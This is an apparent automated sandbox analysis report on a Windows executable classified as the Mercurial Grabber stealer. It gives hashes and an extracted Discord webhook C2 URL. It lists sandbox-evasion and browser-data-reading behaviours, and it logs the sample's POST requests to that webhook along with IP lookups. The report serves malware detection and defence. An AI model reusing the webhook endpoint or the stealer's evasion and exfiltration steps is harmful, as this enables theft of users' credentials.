Analysis

  • max time kernel
    93s
  • max time network
    158s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240704-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240704-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    07/07/2024, 07:31 UTC

General

  • Target

    136ce1f5f2299e4f8e3fb5e30dc0f149.exe

  • Size

    41KB

  • MD5

    136ce1f5f2299e4f8e3fb5e30dc0f149

  • SHA1

    29460774476d4667f63a6abb5bcb29f603471589

  • SHA256

    68f01e0d0f2bf1705c62ad8b94d4454d2646aced975b56e593c59a58e4b0ccca

  • SHA512

    af5d31d017c155bb0043603de76a8a822a25d8a573d9bc87c549fd823c0ab33d42ede18dafb142cc6a3121441767075cd6d61c08cffa458fa91fd493b3cee4d9

  • SSDEEP

    768:2scaIiIqfT6ajQdpDXsw7uZ7ejWTjvBKZKfgm3Ehzm:Vc1ofnI6ejWTbBF7EBm

Malware Config

Extracted

Family

mercurialgrabber

C2

https://discord.com/api/webhooks/1241448843959079032/HMgH2saTiZy9AeNAE4DxehoML8c_SJy5ub_JvUcxJk3wiNt3MyPnFu2k8elCddlfbFXT

Signatures

  • Mercurial Grabber Stealer

    Mercurial Grabber is an open source stealer targeting Chrome, Discord and some game clients as well as generic system information.

  • Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
  • Looks for VMWare Tools registry key 2 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 1 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Checks SCSI registry key(s) 3 TTPs 1 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\136ce1f5f2299e4f8e3fb5e30dc0f149.exe
    "C:\Users\Admin\AppData\Local\Temp\136ce1f5f2299e4f8e3fb5e30dc0f149.exe"
    1
    • Looks for VirtualBox Guest Additions in registry
    • Looks for VMWare Tools registry key
    • Checks BIOS information in registry
    • Maps connected drives based on registry
    • Checks SCSI registry key(s)
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious use of AdjustPrivilegeToken
    PID:1568

Network

  • flag-us
    DNS
    ip4.seeip.org
    136ce1f5f2299e4f8e3fb5e30dc0f149.exe
    Remote address:
    8.8.8.8:53
    Request
    ip4.seeip.org
    IN A
    Response
    ip4.seeip.org
    IN A
    23.128.64.141
  • flag-us
    GET
    https://ip4.seeip.org/
    136ce1f5f2299e4f8e3fb5e30dc0f149.exe
    Remote address:
    23.128.64.141:443
    Request
    GET / HTTP/1.1
    Host: ip4.seeip.org
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.14.0 (Ubuntu)
    Date: Sun, 07 Jul 2024 07:31:56 GMT
    Content-Type: text/plain
    Content-Length: 13
    Connection: keep-alive
    strict-transport-security: max-age=31536000; includeSubDomains
  • flag-us
    DNS
    ip-api.com
    136ce1f5f2299e4f8e3fb5e30dc0f149.exe
    Remote address:
    8.8.8.8:53
    Request
    ip-api.com
    IN A
    Response
    ip-api.com
    IN A
    208.95.112.1
  • flag-us
    GET
    http://ip-api.com//json/194.110.13.70
    136ce1f5f2299e4f8e3fb5e30dc0f149.exe
    Remote address:
    208.95.112.1:80
    Request
    GET //json/194.110.13.70 HTTP/1.1
    Host: ip-api.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Sun, 07 Jul 2024 07:31:56 GMT
    Content-Type: application/json; charset=utf-8
    Content-Length: 311
    Access-Control-Allow-Origin: *
    X-Ttl: 60
    X-Rl: 44
  • flag-us
    DNS
    discord.com
    136ce1f5f2299e4f8e3fb5e30dc0f149.exe
    Remote address:
    8.8.8.8:53
    Request
    discord.com
    IN A
    Response
    discord.com
    IN A
    162.159.138.232
    discord.com
    IN A
    162.159.137.232
    discord.com
    IN A
    162.159.128.233
    discord.com
    IN A
    162.159.135.232
    discord.com
    IN A
    162.159.136.232
  • flag-us
    POST
    https://discord.com/api/webhooks/1241448843959079032/HMgH2saTiZy9AeNAE4DxehoML8c_SJy5ub_JvUcxJk3wiNt3MyPnFu2k8elCddlfbFXT
    136ce1f5f2299e4f8e3fb5e30dc0f149.exe
    Remote address:
    162.159.138.232:443
    Request
    POST /api/webhooks/1241448843959079032/HMgH2saTiZy9AeNAE4DxehoML8c_SJy5ub_JvUcxJk3wiNt3MyPnFu2k8elCddlfbFXT HTTP/1.1
    Content-Type: application/json
    Host: discord.com
    Content-Length: 459
    Expect: 100-continue
    Connection: Keep-Alive
    Response
    HTTP/1.1 404 Not Found
    Date: Sun, 07 Jul 2024 07:31:57 GMT
    Content-Type: application/json
    Content-Length: 45
    Connection: keep-alive
    set-cookie: __dcfduid=fdb145ec3c3211ef87398ea91c0139ed; Expires=Fri, 06-Jul-2029 07:31:57 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
    x-ratelimit-limit: 5
    x-ratelimit-remaining: 4
    x-ratelimit-reset: 1720337518
    x-ratelimit-reset-after: 1
    via: 1.1 google
    alt-svc: h3=":443"; ma=86400
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1sh8viXJgqIIKPmzHbxMLDaa79BUrlNvZcjjLQAqNiROlKvMaI5hVc7e9cZP2T%2FcNHUc2JRj1fG9L0Auh5oFEZVMnccx10vM2I8Lu%2BSv%2FVJcGKMoDzOBHTn94F1n"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    X-Content-Type-Options: nosniff
    Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
    Set-Cookie: __sdcfduid=fdb145ec3c3211ef87398ea91c0139ed07dbd8c96e550e95f9e598124f5a4f6ba8e3f323306f29b37b1eaaf37ad172ab; Expires=Fri, 06-Jul-2029 07:31:57 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    Set-Cookie: __cfruid=bec44f1fd52a35b57f301cd2a7cfeac7c77dd5a8-1720337517; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Set-Cookie: _cfuvid=TloOL9S2pRr_OHc4YTF9sDBqG6FWAq1u08UO3v6iExI-1720337517450-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Server: cloudflare
    CF-RAY: 89f6234aeab560ff-LHR
  • flag-us
    POST
    https://discord.com/api/webhooks/1241448843959079032/HMgH2saTiZy9AeNAE4DxehoML8c_SJy5ub_JvUcxJk3wiNt3MyPnFu2k8elCddlfbFXT
    136ce1f5f2299e4f8e3fb5e30dc0f149.exe
    Remote address:
    162.159.138.232:443
    Request
    POST /api/webhooks/1241448843959079032/HMgH2saTiZy9AeNAE4DxehoML8c_SJy5ub_JvUcxJk3wiNt3MyPnFu2k8elCddlfbFXT HTTP/1.1
    Content-Type: application/json
    Host: discord.com
    Content-Length: 315
    Expect: 100-continue
    Response
    HTTP/1.1 404 Not Found
    Date: Sun, 07 Jul 2024 07:31:57 GMT
    Content-Type: application/json
    Content-Length: 45
    Connection: keep-alive
    set-cookie: __dcfduid=fdf597ec3c3211efb48f8ea91c0139ed; Expires=Fri, 06-Jul-2029 07:31:57 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
    x-ratelimit-limit: 5
    x-ratelimit-remaining: 4
    x-ratelimit-reset: 1720337519
    x-ratelimit-reset-after: 1
    via: 1.1 google
    alt-svc: h3=":443"; ma=86400
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bpjRTVO%2BseRTAzkvfRJnrYUVb7zk%2FT4aoq4KXIDaqtWLIbN1p%2F%2FWNgeNXqZLTHXMnRvOr6f9%2BxkwzRazFdDVIGdLpN7bQPggKB12uci8hW3EUCvrIYLjaeTQhmjF"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    X-Content-Type-Options: nosniff
    Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
    Set-Cookie: __sdcfduid=fdf597ec3c3211efb48f8ea91c0139edb813a13b9301f752c1db3795edc39a08057a75fd8f467799978d0d0b0fa59aa9; Expires=Fri, 06-Jul-2029 07:31:57 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    Set-Cookie: __cfruid=bec44f1fd52a35b57f301cd2a7cfeac7c77dd5a8-1720337517; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Set-Cookie: _cfuvid=hUAw.7luqzHo58ctpS9BxNKkipakrqi.kd9.aj367tw-1720337517901-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Server: cloudflare
    CF-RAY: 89f6234ddcab60ff-LHR
  • flag-us
    POST
    https://discord.com/api/webhooks/1241448843959079032/HMgH2saTiZy9AeNAE4DxehoML8c_SJy5ub_JvUcxJk3wiNt3MyPnFu2k8elCddlfbFXT
    136ce1f5f2299e4f8e3fb5e30dc0f149.exe
    Remote address:
    162.159.138.232:443
    Request
    POST /api/webhooks/1241448843959079032/HMgH2saTiZy9AeNAE4DxehoML8c_SJy5ub_JvUcxJk3wiNt3MyPnFu2k8elCddlfbFXT HTTP/1.1
    Content-Type: application/json
    Host: discord.com
    Content-Length: 748
    Expect: 100-continue
    Response
    HTTP/1.1 404 Not Found
    Date: Sun, 07 Jul 2024 07:32:01 GMT
    Content-Type: application/json
    Content-Length: 45
    Connection: keep-alive
    set-cookie: __dcfduid=00208ce83c3311ef9adb2a27ef84ee9d; Expires=Fri, 06-Jul-2029 07:32:01 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
    x-ratelimit-limit: 5
    x-ratelimit-remaining: 4
    x-ratelimit-reset: 1720337522
    x-ratelimit-reset-after: 1
    via: 1.1 google
    alt-svc: h3=":443"; ma=86400
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S3%2Bqa2ButKFc67qyIkywvchZ2O8bzhRByUbbFQIn5pjLnd0U6nyy%2F4URt%2Bz1IHO7UaDywSzvt3v6qeSQGVWFvM24zXc3jl3ET%2B5s0KFS8760gYk6wuWQEaBhcFT%2B"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    X-Content-Type-Options: nosniff
    Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
    Set-Cookie: __sdcfduid=00208ce83c3311ef9adb2a27ef84ee9d5dde2742735d26d4381464753046b35825a425d7158d455a486e96d08b5d851d; Expires=Fri, 06-Jul-2029 07:32:01 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    Set-Cookie: __cfruid=ca908868656234f981e70360b3731692c8d5203e-1720337521; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Set-Cookie: _cfuvid=ps7snWigL3fI9ljf30sA2sUnK9FzoXhNUnOl4VytG1o-1720337521535-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Server: cloudflare
    CF-RAY: 89f623645d4360ff-LHR
  • flag-us
    POST
    https://discord.com/api/webhooks/1241448843959079032/HMgH2saTiZy9AeNAE4DxehoML8c_SJy5ub_JvUcxJk3wiNt3MyPnFu2k8elCddlfbFXT
    136ce1f5f2299e4f8e3fb5e30dc0f149.exe
    Remote address:
    162.159.138.232:443
    Request
    POST /api/webhooks/1241448843959079032/HMgH2saTiZy9AeNAE4DxehoML8c_SJy5ub_JvUcxJk3wiNt3MyPnFu2k8elCddlfbFXT HTTP/1.1
    Content-Type: multipart/form-data; boundary=----------56f099c39d3141f69b3461d39fd97316
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X x.y; rv:42.0) Gecko/20100101 Firefox/42.0
    Host: discord.com
    Content-Length: 662
    Expect: 100-continue
    Response
    HTTP/1.1 404 Not Found
    Date: Sun, 07 Jul 2024 07:32:02 GMT
    Content-Type: application/json
    Content-Length: 45
    Connection: keep-alive
    set-cookie: __dcfduid=00b062963c3311ef942c6a5a2543f6ba; Expires=Fri, 06-Jul-2029 07:32:02 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
    x-ratelimit-limit: 5
    x-ratelimit-remaining: 3
    x-ratelimit-reset: 1720337523
    x-ratelimit-reset-after: 1
    via: 1.1 google
    alt-svc: h3=":443"; ma=86400
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WMf5vu3umOSkvMqTHmeO1Imtmqot7UnDWiGemr5yqtAlCC3ySsbMNiO%2BaeHf70VyK2hnkjs2yLrdOQOXBvQfx%2BcuEAXdu3CJq2sbagt40c03ndujzpWyIHCploGR"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    X-Content-Type-Options: nosniff
    Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
    Set-Cookie: __sdcfduid=00b062963c3311ef942c6a5a2543f6ba532cbdb07052b003f36d6901807406d56f3bfd9ac1cc60223887fe3556173388; Expires=Fri, 06-Jul-2029 07:32:02 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    Set-Cookie: __cfruid=6fa66d8b617a7210f2a278c82b93316bd406df15-1720337522; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Set-Cookie: _cfuvid=Msx2l0k45pMLECFVFM8RaVaxbHfsg1o9cj1A5no7jUM-1720337522484-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Server: cloudflare
    CF-RAY: 89f6236a79f260ff-LHR
  • flag-us
    DNS
    141.64.128.23.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    141.64.128.23.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    1.112.95.208.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    1.112.95.208.in-addr.arpa
    IN PTR
    Response
    1.112.95.208.in-addr.arpa
    IN PTR
    ip-apicom
  • flag-us
    DNS
    232.138.159.162.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    232.138.159.162.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    81.144.22.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    81.144.22.2.in-addr.arpa
    IN PTR
    Response
    81.144.22.2.in-addr.arpa
    IN PTR
    a2-22-144-81deploystaticakamaitechnologiescom
  • flag-us
    DNS
    205.47.74.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    205.47.74.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    g.bing.com
    Remote address:
    8.8.8.8:53
    Request
    g.bing.com
    IN A
    Response
    g.bing.com
    IN CNAME
    g-bing-com.dual-a-0034.a-msedge.net
    g-bing-com.dual-a-0034.a-msedge.net
    IN CNAME
    dual-a-0034.a-msedge.net
    dual-a-0034.a-msedge.net
    IN A
    204.79.197.237
    dual-a-0034.a-msedge.net
    IN A
    13.107.21.237
  • flag-us
    GET
    https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=7aa12736dda44dd897ad2ea3d42a37ae&localId=w:AC8A65C9-3627-487C-D9AB-A11B6BA54504&deviceId=6755471616933186&anid=
    Remote address:
    204.79.197.237:443
    Request
    GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=7aa12736dda44dd897ad2ea3d42a37ae&localId=w:AC8A65C9-3627-487C-D9AB-A11B6BA54504&deviceId=6755471616933186&anid= HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    set-cookie: MUID=3586313705F463281A822582044F6248; domain=.bing.com; expires=Fri, 01-Aug-2025 07:32:01 GMT; path=/; SameSite=None; Secure; Priority=High;
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 0B21876FE1F9457CA683D6E900AF6750 Ref B: LON04EDGE0810 Ref C: 2024-07-07T07:32:01Z
    date: Sun, 07 Jul 2024 07:32:01 GMT
  • flag-us
    GET
    https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=7aa12736dda44dd897ad2ea3d42a37ae&localId=w:AC8A65C9-3627-487C-D9AB-A11B6BA54504&deviceId=6755471616933186&anid=
    Remote address:
    204.79.197.237:443
    Request
    GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=7aa12736dda44dd897ad2ea3d42a37ae&localId=w:AC8A65C9-3627-487C-D9AB-A11B6BA54504&deviceId=6755471616933186&anid= HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    cookie: MUID=3586313705F463281A822582044F6248
    Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    set-cookie: MSPTC=mY3UuG_nBc2OL1LAU47YyOvFSXHXmvfukO17eZtHG00; domain=.bing.com; expires=Fri, 01-Aug-2025 07:32:01 GMT; path=/; Partitioned; secure; SameSite=None
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 8B9EA31163D24AEE81692B920C4462D6 Ref B: LON04EDGE0810 Ref C: 2024-07-07T07:32:01Z
    date: Sun, 07 Jul 2024 07:32:01 GMT
  • flag-us
    GET
    https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=7aa12736dda44dd897ad2ea3d42a37ae&localId=w:AC8A65C9-3627-487C-D9AB-A11B6BA54504&deviceId=6755471616933186&anid=
    Remote address:
    204.79.197.237:443
    Request
    GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=7aa12736dda44dd897ad2ea3d42a37ae&localId=w:AC8A65C9-3627-487C-D9AB-A11B6BA54504&deviceId=6755471616933186&anid= HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    cookie: MUID=3586313705F463281A822582044F6248; MSPTC=mY3UuG_nBc2OL1LAU47YyOvFSXHXmvfukO17eZtHG00
    Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 19EFCFA2A04B4663B0D9F7E746A50AFF Ref B: LON04EDGE0810 Ref C: 2024-07-07T07:32:01Z
    date: Sun, 07 Jul 2024 07:32:01 GMT
  • flag-us
    POST
    https://discord.com/api/webhooks/1241448843959079032/HMgH2saTiZy9AeNAE4DxehoML8c_SJy5ub_JvUcxJk3wiNt3MyPnFu2k8elCddlfbFXT
    136ce1f5f2299e4f8e3fb5e30dc0f149.exe
    Remote address:
    162.159.138.232:443
    Request
    POST /api/webhooks/1241448843959079032/HMgH2saTiZy9AeNAE4DxehoML8c_SJy5ub_JvUcxJk3wiNt3MyPnFu2k8elCddlfbFXT HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: discord.com
    Content-Length: 196
    Expect: 100-continue
    Response
    HTTP/1.1 404 Not Found
    Date: Sun, 07 Jul 2024 07:32:02 GMT
    Content-Type: application/json
    Content-Length: 45
    Connection: keep-alive
    set-cookie: __dcfduid=007a08043c3311ef8645c28e99b9b89b; Expires=Fri, 06-Jul-2029 07:32:02 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
    x-ratelimit-limit: 5
    x-ratelimit-remaining: 4
    x-ratelimit-reset: 1720337523
    x-ratelimit-reset-after: 1
    via: 1.1 google
    alt-svc: h3=":443"; ma=86400
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9UVmPNienKgh81S7s50iSaGCj45K4y4sKqzfSw3Tz7J8dOkovtzbsCE4OV4ZBqA7XQMFraNwe5y%2BcCRTZH8A%2F3iT%2BP9mac58nx60iFJAhOjGj%2BBh4pUvmbV3QSHH"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    X-Content-Type-Options: nosniff
    Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
    Set-Cookie: __sdcfduid=007a08043c3311ef8645c28e99b9b89b25de1689bcbe1545e02af90d7e517a665a3f773565b81de0374da1198cc42d95; Expires=Fri, 06-Jul-2029 07:32:02 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    Set-Cookie: __cfruid=f96b104d3923dee429ed3f1cf50fd3e468e6af7a-1720337522; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Set-Cookie: _cfuvid=qPMjk76UKKZKdZJm3t9005_enDkkOUwbdG8ufjQQqcM-1720337522121-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Server: cloudflare
    CF-RAY: 89f62367cada71e4-LHR
  • flag-us
    DNS
    237.197.79.204.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    237.197.79.204.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    26.165.165.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    26.165.165.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    198.187.3.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    198.187.3.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    172.210.232.199.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    172.210.232.199.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    73.144.22.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    73.144.22.2.in-addr.arpa
    IN PTR
    Response
    73.144.22.2.in-addr.arpa
    IN PTR
    a2-22-144-73deploystaticakamaitechnologiescom
  • flag-us
    DNS
    13.227.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    13.227.111.52.in-addr.arpa
    IN PTR
    Response
  • 23.128.64.141:443
    https://ip4.seeip.org/
    tls, http
    136ce1f5f2299e4f8e3fb5e30dc0f149.exe
    808 B
    3.8kB
    10
    8

    HTTP Request

    GET https://ip4.seeip.org/

    HTTP Response

    200
  • 208.95.112.1:80
    http://ip-api.com//json/194.110.13.70
    http
    136ce1f5f2299e4f8e3fb5e30dc0f149.exe
    355 B
    620 B
    6
    3

    HTTP Request

    GET http://ip-api.com//json/194.110.13.70

    HTTP Response

    200
  • 162.159.138.232:443
    https://discord.com/api/webhooks/1241448843959079032/HMgH2saTiZy9AeNAE4DxehoML8c_SJy5ub_JvUcxJk3wiNt3MyPnFu2k8elCddlfbFXT
    tls, http
    136ce1f5f2299e4f8e3fb5e30dc0f149.exe
    4.7kB
    10.8kB
    22
    28

    HTTP Request

    POST https://discord.com/api/webhooks/1241448843959079032/HMgH2saTiZy9AeNAE4DxehoML8c_SJy5ub_JvUcxJk3wiNt3MyPnFu2k8elCddlfbFXT

    HTTP Response

    404

    HTTP Request

    POST https://discord.com/api/webhooks/1241448843959079032/HMgH2saTiZy9AeNAE4DxehoML8c_SJy5ub_JvUcxJk3wiNt3MyPnFu2k8elCddlfbFXT

    HTTP Response

    404

    HTTP Request

    POST https://discord.com/api/webhooks/1241448843959079032/HMgH2saTiZy9AeNAE4DxehoML8c_SJy5ub_JvUcxJk3wiNt3MyPnFu2k8elCddlfbFXT

    HTTP Response

    404

    HTTP Request

    POST https://discord.com/api/webhooks/1241448843959079032/HMgH2saTiZy9AeNAE4DxehoML8c_SJy5ub_JvUcxJk3wiNt3MyPnFu2k8elCddlfbFXT

    HTTP Response

    404
  • 204.79.197.237:443
    https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=7aa12736dda44dd897ad2ea3d42a37ae&localId=w:AC8A65C9-3627-487C-D9AB-A11B6BA54504&deviceId=6755471616933186&anid=
    tls, http2
    2.0kB
    9.3kB
    22
    19

    HTTP Request

    GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=7aa12736dda44dd897ad2ea3d42a37ae&localId=w:AC8A65C9-3627-487C-D9AB-A11B6BA54504&deviceId=6755471616933186&anid=

    HTTP Response

    204

    HTTP Request

    GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=7aa12736dda44dd897ad2ea3d42a37ae&localId=w:AC8A65C9-3627-487C-D9AB-A11B6BA54504&deviceId=6755471616933186&anid=

    HTTP Response

    204

    HTTP Request

    GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=7aa12736dda44dd897ad2ea3d42a37ae&localId=w:AC8A65C9-3627-487C-D9AB-A11B6BA54504&deviceId=6755471616933186&anid=

    HTTP Response

    204
  • 162.159.138.232:443
    https://discord.com/api/webhooks/1241448843959079032/HMgH2saTiZy9AeNAE4DxehoML8c_SJy5ub_JvUcxJk3wiNt3MyPnFu2k8elCddlfbFXT
    tls, http
    136ce1f5f2299e4f8e3fb5e30dc0f149.exe
    1.3kB
    2.2kB
    9
    9

    HTTP Request

    POST https://discord.com/api/webhooks/1241448843959079032/HMgH2saTiZy9AeNAE4DxehoML8c_SJy5ub_JvUcxJk3wiNt3MyPnFu2k8elCddlfbFXT

    HTTP Response

    404
  • 8.8.8.8:53
    ip4.seeip.org
    dns
    136ce1f5f2299e4f8e3fb5e30dc0f149.exe
    59 B
    75 B
    1
    1

    DNS Request

    ip4.seeip.org

    DNS Response

    23.128.64.141

  • 8.8.8.8:53
    ip-api.com
    dns
    136ce1f5f2299e4f8e3fb5e30dc0f149.exe
    56 B
    72 B
    1
    1

    DNS Request

    ip-api.com

    DNS Response

    208.95.112.1

  • 8.8.8.8:53
    discord.com
    dns
    136ce1f5f2299e4f8e3fb5e30dc0f149.exe
    57 B
    137 B
    1
    1

    DNS Request

    discord.com

    DNS Response

    162.159.138.232
    162.159.137.232
    162.159.128.233
    162.159.135.232
    162.159.136.232

  • 8.8.8.8:53
    141.64.128.23.in-addr.arpa
    dns
    72 B
    140 B
    1
    1

    DNS Request

    141.64.128.23.in-addr.arpa

  • 8.8.8.8:53
    1.112.95.208.in-addr.arpa
    dns
    71 B
    95 B
    1
    1

    DNS Request

    1.112.95.208.in-addr.arpa

  • 8.8.8.8:53
    232.138.159.162.in-addr.arpa
    dns
    74 B
    136 B
    1
    1

    DNS Request

    232.138.159.162.in-addr.arpa

  • 8.8.8.8:53
    81.144.22.2.in-addr.arpa
    dns
    70 B
    133 B
    1
    1

    DNS Request

    81.144.22.2.in-addr.arpa

  • 8.8.8.8:53
    205.47.74.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    205.47.74.20.in-addr.arpa

  • 8.8.8.8:53
    g.bing.com
    dns
    56 B
    151 B
    1
    1

    DNS Request

    g.bing.com

    DNS Response

    204.79.197.237
    13.107.21.237

  • 8.8.8.8:53
    237.197.79.204.in-addr.arpa
    dns
    73 B
    143 B
    1
    1

    DNS Request

    237.197.79.204.in-addr.arpa

  • 8.8.8.8:53
    26.165.165.52.in-addr.arpa
    dns
    72 B
